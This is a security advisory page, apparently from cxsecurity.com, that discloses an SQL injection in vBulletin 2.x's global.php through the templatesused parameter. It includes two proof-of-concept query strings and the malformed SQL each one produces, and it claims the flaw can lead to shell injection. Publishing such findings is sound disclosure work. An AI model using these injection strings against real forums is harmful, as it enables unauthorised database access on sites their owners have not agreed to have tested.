Vbulletin 2.X sql injection

Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hello,, Vbulletin 2.X sql injection Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] This is sql injection in vbulletin systems the injection is in the global.php file we can use it global.php?templatesused=))/* the query will be SELECT template,title FROM template WHERE (title IN ('))/*','gobutton','timezone','username_loggedout','username_loggedin',' phpinclude','headinclude','header','footer','forumjumpbit','forumjump',' nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpa ge','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_p agelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid global.php?templatesused=nn,dd,'))/* SELECT template,title FROM template WHERE (title IN ('nn','dd','\'))/*','gobutton','timezone','username_loggedout','userna me_loggedin','phpinclude','headinclude','header','footer','forumjumpbit' ,'forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav', 'pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextli nk','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid It Can be used as shell injection Tested on VB 2.3.X and other versions are injected ..(2.X) #WwW.SoQoR.NeT

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com


Back to Top